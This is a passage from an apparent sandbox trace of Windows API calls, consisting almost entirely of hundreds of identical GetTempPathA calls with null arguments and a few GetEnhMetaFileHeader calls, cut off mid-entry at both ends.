lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.180] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.180] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: 
